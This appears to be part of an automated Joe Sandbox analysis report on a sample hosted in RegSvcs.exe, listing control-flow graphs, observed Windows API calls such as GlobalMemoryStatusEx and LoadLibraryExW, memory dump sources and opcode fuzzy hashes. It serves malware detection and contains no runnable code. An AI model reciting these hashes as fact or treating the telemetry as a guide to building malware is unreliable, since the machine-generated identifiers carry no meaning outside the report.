                                                                                                    control_flow_graph 1266 147ee40-147eeb2 1275 147eee5-147ef0e 1266->1275 1276 147eeb4-147eecf 1266->1276 1285 147ef41-147ef7a 1275->1285 1286 147ef10-147ef2b 1275->1286 1283 147eed6-147eede 1276->1283 1283->1275 1289 147f141-147f15f 1285->1289 1290 147ef80-147efd4 call 147f2f5 1285->1290 1297 147ef32-147ef3a 1286->1297 1295 147f160 1289->1295 1304 147f0fa-147f11e 1290->1304 1305 147efda-147f03b 1290->1305 1295->1295 1297->1285 1310 147f120 1304->1310 1311 147f129-147f12a 1304->1311 1320 147f041-147f09c BasepProcessInvalidImage 1305->1320 1321 147f0e9-147f0f4 1305->1321 1310->1311 1311->1289 1330 147f0b6-147f0cd 1320->1330 1331 147f09e-147f0a4 1320->1331 1321->1304 1321->1305 1337 147f0d6 1330->1337 1332 147f0a6 1331->1332 1333 147f0a8-147f0b4 1331->1333 1332->1330 1333->1330 1337->1321
                                                                                                    APIs
                                                                                                    • BasepProcessInvalidImage.KERNEL32 ref: 0147F083
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.556279028.0000000001470000.00000040.00000010.sdmp, Offset: 01470000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_1470000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: BasepImageInvalidProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 254064073-0
                                                                                                    • Opcode ID: 05d13695915da10beb0aa8b53839228b5cc5c70fe8085437e2b161064ec1b31c
                                                                                                    • Instruction ID: c4424fb6d01178c60d8281e49cf2845c09b95dec97933545785f91b29b5ccb69
                                                                                                    • Opcode Fuzzy Hash: 05d13695915da10beb0aa8b53839228b5cc5c70fe8085437e2b161064ec1b31c
                                                                                                    • Instruction Fuzzy Hash: 93717234B042158FDB14EBB9D4687AE76E3AFC8744F158429E506EB394EF749C028BD2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1339 1689c78-1689cc4 LdrInitializeThunk 1343 1689ccb-1689cd7 1339->1343 1344 1689ed8-1689eeb 1343->1344 1345 1689cdd-1689ce6 1343->1345 1346 1689f12-1689f16 1344->1346 1347 1689cec-1689d01 1345->1347 1348 1689f0d 1345->1348 1349 1689f18 1346->1349 1350 1689f21 1346->1350 1352 1689d1b-1689d36 1347->1352 1353 1689d03-1689d16 1347->1353 1348->1346 1349->1350 1354 1689f22 1350->1354 1362 1689d38-1689d42 1352->1362 1363 1689d44 1352->1363 1355 1689eac-1689eb0 1353->1355 1354->1354 1357 1689ebb-1689ebc 1355->1357 1358 1689eb2 1355->1358 1357->1344 1358->1357 1364 1689d49-1689d4b 1362->1364 1363->1364 1365 1689d4d-1689d60 1364->1365 1366 1689d65-1689dfe 1364->1366 1365->1355 1384 1689e0c 1366->1384 1385 1689e00-1689e0a 1366->1385 1386 1689e11-1689e13 1384->1386 1385->1386 1387 1689e15-1689e17 1386->1387 1388 1689e56-1689eaa 1386->1388 1389 1689e19-1689e23 1387->1389 1390 1689e25 1387->1390 1388->1355 1392 1689e2a-1689e2c 1389->1392 1390->1392 1392->1388 1393 1689e2e-1689e54 1392->1393 1393->1388
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.556994309.0000000001680000.00000040.00000010.sdmp, Offset: 01680000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_1680000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 67ebb5a9d99950e1889c7dd5e9105d33828bfcb3d5d8ab5ec6a7e0922cc0bb47
                                                                                                    • Instruction ID: aa68c747c8c78ff9ead8ab4a804bcced3338c5285cf375a7da4a1f81197d3bfc
                                                                                                    • Opcode Fuzzy Hash: 67ebb5a9d99950e1889c7dd5e9105d33828bfcb3d5d8ab5ec6a7e0922cc0bb47
                                                                                                    • Instruction Fuzzy Hash: 17613234A01209DBDB24EFB5D858BBEBBB6AFC8709F108929E40697394DF749845CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1403 168e928-168e933 1404 168e95d-168e97c call 1689380 1403->1404 1405 168e935-168e95c call 1689374 1403->1405 1411 168e97e-168e981 1404->1411 1412 168e982-168e9b9 1404->1412 1417 168e9bb-168e9c1 1412->1417 1418 168ea01-168ea06 1412->1418 1419 168ea09-168ea74 GlobalMemoryStatusEx 1417->1419 1420 168e9c3-168e9e1 1417->1420 1418->1419 1423 168ea7d-168eaa5 1419->1423 1424 168ea76-168ea7c 1419->1424 1427 168e9e3-168e9e6 1420->1427 1428 168e9e7-168ea00 1420->1428 1424->1423 1428->1418
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.556994309.0000000001680000.00000040.00000010.sdmp, Offset: 01680000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_1680000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 08411cb0a7060cbdf26c89e1154eb1cdb18483ec2f970ff5dde7fcc5975049fd
                                                                                                    • Instruction ID: 9550a718cf4403e5122d8af1919dd2e96f2ed04a260cf6bc4c3d0079dc32f26d
                                                                                                    • Opcode Fuzzy Hash: 08411cb0a7060cbdf26c89e1154eb1cdb18483ec2f970ff5dde7fcc5975049fd
                                                                                                    • Instruction Fuzzy Hash: D4412671D043598FCB00DFA9C8042DAFBF5AF85314F04866AD945A7351EB749845CBE1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1432 147f12c-147f13b 1434 147f141-147f15f 1432->1434 1435 147ef80-147ef88 call 147f2f5 1432->1435 1438 147f160 1434->1438 1437 147ef8e-147efa5 1435->1437 1441 147efac 1437->1441 1438->1438 1442 147efb3-147efd4 1441->1442 1446 147f0fa-147f11e 1442->1446 1447 147efda-147f03b 1442->1447 1452 147f120 1446->1452 1453 147f129-147f12a 1446->1453 1462 147f041-147f053 1447->1462 1463 147f0e9-147f0f4 1447->1463 1452->1453 1453->1434 1467 147f059-147f067 1462->1467 1463->1446 1463->1447 1469 147f071-147f075 1467->1469 1470 147f07f-147f08e BasepProcessInvalidImage 1469->1470 1471 147f098-147f09c 1470->1471 1472 147f0b6 1471->1472 1473 147f09e-147f0a4 1471->1473 1476 147f0bc-147f0cd 1472->1476 1474 147f0a6 1473->1474 1475 147f0a8-147f0b4 1473->1475 1474->1472 1475->1472 1479 147f0d6 1476->1479 1479->1463
                                                                                                    APIs
                                                                                                    • BasepProcessInvalidImage.KERNEL32 ref: 0147F083
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.556279028.0000000001470000.00000040.00000010.sdmp, Offset: 01470000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_1470000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: BasepImageInvalidProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 254064073-0
                                                                                                    • Opcode ID: 5c48d091376ed5f56ede3c3c34bfbaad91708a64bb9d4a24431d181a584ccd79
                                                                                                    • Instruction ID: 3fcfd5402f8aafe660cbf6ac5721d82612948b84f6520a412129362f9cd21f38
                                                                                                    • Opcode Fuzzy Hash: 5c48d091376ed5f56ede3c3c34bfbaad91708a64bb9d4a24431d181a584ccd79
                                                                                                    • Instruction Fuzzy Hash: F2419974B412158FDB24EBB4D4287BE76F6EF88704F15842AE516DB3A4DF748C028B92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1573 168e9f8-168ea3e 1577 168ea46-168ea74 GlobalMemoryStatusEx 1573->1577 1578 168ea7d-168eaa5 1577->1578 1579 168ea76-168ea7c 1577->1579 1579->1578
                                                                                                    APIs
                                                                                                    • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,0168E97A), ref: 0168EA67
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.556994309.0000000001680000.00000040.00000010.sdmp, Offset: 01680000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_1680000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: GlobalMemoryStatus
                                                                                                    • String ID:
                                                                                                    • API String ID: 1890195054-0
                                                                                                    • Opcode ID: 69e90e9f7d9327e9fbee70790532e094c7b83e14dd498013afcc1b7affc4dce8
                                                                                                    • Instruction ID: 4f379eb088ffd68fccb17c874845e256e95bd9f1ccbb67bb5e1b347588ae47c0
                                                                                                    • Opcode Fuzzy Hash: 69e90e9f7d9327e9fbee70790532e094c7b83e14dd498013afcc1b7affc4dce8
                                                                                                    • Instruction Fuzzy Hash: D9210FB1C0025A9FCB00CFAAC844ADEFBB4AF49624F14816AD918B7240D378A945CBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1582 1689380-168ea74 GlobalMemoryStatusEx 1587 168ea7d-168eaa5 1582->1587 1588 168ea76-168ea7c 1582->1588 1588->1587
                                                                                                    APIs
                                                                                                    • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,0168E97A), ref: 0168EA67
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.556994309.0000000001680000.00000040.00000010.sdmp, Offset: 01680000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_1680000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: GlobalMemoryStatus
                                                                                                    • String ID:
                                                                                                    • API String ID: 1890195054-0
                                                                                                    • Opcode ID: ca9a4ba6573c4d082b816dfc1eb037ae3aa04d91babae6e158f70664e22703bb
                                                                                                    • Instruction ID: 72eada31fcd54bf64a12683590648f3a459b5833fb5ee9bfdb73b64b1e966566
                                                                                                    • Opcode Fuzzy Hash: ca9a4ba6573c4d082b816dfc1eb037ae3aa04d91babae6e158f70664e22703bb
                                                                                                    • Instruction Fuzzy Hash: 0C11F4B1C006599BCB10DF9AC8447DEFBF4BF48624F14856AD914B7240D378A945CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,017287D9,00000800), ref: 0172886A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.557264661.0000000001720000.00000040.00000010.sdmp, Offset: 01720000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_1720000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad
                                                                                                    • String ID:
                                                                                                    • API String ID: 1029625771-0
                                                                                                    • Opcode ID: e8a703707e638d0d1c2a806832db8fe491a0ff4f446c04fead153722686bb80c
                                                                                                    • Instruction ID: 86ef35b5e284fd11d718cba12cd9b938af1842d3eb006283c01a03ebffecf347
                                                                                                    • Opcode Fuzzy Hash: e8a703707e638d0d1c2a806832db8fe491a0ff4f446c04fead153722686bb80c
                                                                                                    • Instruction Fuzzy Hash: 241117B6D002199FDB14CF9AD444BDEFBF4EB88310F14842AE515B7600C375A945CFA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,017287D9,00000800), ref: 0172886A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.557264661.0000000001720000.00000040.00000010.sdmp, Offset: 01720000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_1720000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad
                                                                                                    • String ID:
                                                                                                    • API String ID: 1029625771-0
                                                                                                    • Opcode ID: af476b2ad27849fe1dd2f4ad4fe3474d9593687033f78ba72c2b71ef49cba275
                                                                                                    • Instruction ID: 2a562a0069296ae17822115aab30bd31305c7ad240df66794a46732b8b4335b9
                                                                                                    • Opcode Fuzzy Hash: af476b2ad27849fe1dd2f4ad4fe3474d9593687033f78ba72c2b71ef49cba275
                                                                                                    • Instruction Fuzzy Hash: 341122B6C002598FDB14CFAAD444ADEFBF4AB88320F14842AD555A7200C375A945CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • OleInitialize.OLE32(00000000), ref: 0172C185
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.557264661.0000000001720000.00000040.00000010.sdmp, Offset: 01720000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_1720000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Initialize
                                                                                                    • String ID:
                                                                                                    • API String ID: 2538663250-0
                                                                                                    • Opcode ID: 8653f41f6fda86d49717740b17aac808c7c3f6ffcb1f046da7fda3d75feb7f69
                                                                                                    • Instruction ID: 1116f97f1b8c3aa39056e60eb0ce29c0404b82e588ad3e32a41828d9cdd7381c
                                                                                                    • Opcode Fuzzy Hash: 8653f41f6fda86d49717740b17aac808c7c3f6ffcb1f046da7fda3d75feb7f69
                                                                                                    • Instruction Fuzzy Hash: 391125B59043498FCB20CFA9C445BCEFFF8AB88324F24855AE559A7600C378A945CBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • OleInitialize.OLE32(00000000), ref: 0172C185
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.557264661.0000000001720000.00000040.00000010.sdmp, Offset: 01720000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_1720000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Initialize
                                                                                                    • String ID:
                                                                                                    • API String ID: 2538663250-0
                                                                                                    • Opcode ID: 6b3ed39f564370d4f6ee7d3d5b1c37736782c46417e46b22df9b43a7ff2f51c9
                                                                                                    • Instruction ID: 536ed90ddf4df9f2dc561ae83f2e50c1248609b1f36d9aff98bd8f37302e7b22
                                                                                                    • Opcode Fuzzy Hash: 6b3ed39f564370d4f6ee7d3d5b1c37736782c46417e46b22df9b43a7ff2f51c9
                                                                                                    • Instruction Fuzzy Hash: EC1122B09042598FCB10CFA9D445BDEFBF8EB48324F248459E519B3600C374A944CBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.556527681.00000000014CD000.00000040.00000001.sdmp, Offset: 014CD000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_14cd000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f11e39823e413dac99d357cb172782e22b9c08803c4c17eae8b218870fe36e96
                                                                                                    • Instruction ID: a47fa1e9972abaeeebe07d37690445d73bf3110bbd250ac20be267fefa1f0fe2
                                                                                                    • Opcode Fuzzy Hash: f11e39823e413dac99d357cb172782e22b9c08803c4c17eae8b218870fe36e96
                                                                                                    • Instruction Fuzzy Hash: 41212775900240DFCB45DF94D9C0B17BB65FB98728F24857EE8090B256C336D446C7E1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.556611007.00000000014DD000.00000040.00000001.sdmp, Offset: 014DD000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_14dd000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b114404fa3e63b7ac205bb65a08b93c5dd08f80232c43b98cddb269c721ee2ea
                                                                                                    • Instruction ID: 61b8a82c65fe707dfcbcfac73a5aee64a00dbbd4bc50e705c4b6e65eb4b6317b
                                                                                                    • Opcode Fuzzy Hash: b114404fa3e63b7ac205bb65a08b93c5dd08f80232c43b98cddb269c721ee2ea
                                                                                                    • Instruction Fuzzy Hash: 2A21F4B1904240DFCF16CFA4D8D4B16BB65FB84268F24C96AD8090B396C336D847CB61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.556611007.00000000014DD000.00000040.00000001.sdmp, Offset: 014DD000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_14dd000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9e3d5a6c9f8bc05ccda6862c7b9e22be0f6f35b409c5b52bcc280bb73e8f1283
                                                                                                    • Instruction ID: 0f2eb7eef8cdf04e3292c92bd2047767b1b53284be8fb3aad466432671e9578b
                                                                                                    • Opcode Fuzzy Hash: 9e3d5a6c9f8bc05ccda6862c7b9e22be0f6f35b409c5b52bcc280bb73e8f1283
                                                                                                    • Instruction Fuzzy Hash: 7D2183B54083809FCB03CF64D994712BF71EB86214F28C5DBD8458F6A7C33A9846CB62
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.556527681.00000000014CD000.00000040.00000001.sdmp, Offset: 014CD000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_14cd000_RegSvcs.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: bfec3cb27130703432ebaa7756116e99e0261673e76136829534a65b319a9084
                                                                                                    • Instruction ID: c9f6c3bb8a8a2032a9e3c116cb78213a0e6ce3b3641dbe3c5588dbb6e0a6aefc
                                                                                                    • Opcode Fuzzy Hash: bfec3cb27130703432ebaa7756116e99e0261673e76136829534a65b319a9084
                                                                                                    • Instruction Fuzzy Hash: 1F11B176904280CFCB06CF54D5C4B16BF72FB94724F2886AED8094B766C33AD45ACBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Non-executed Functions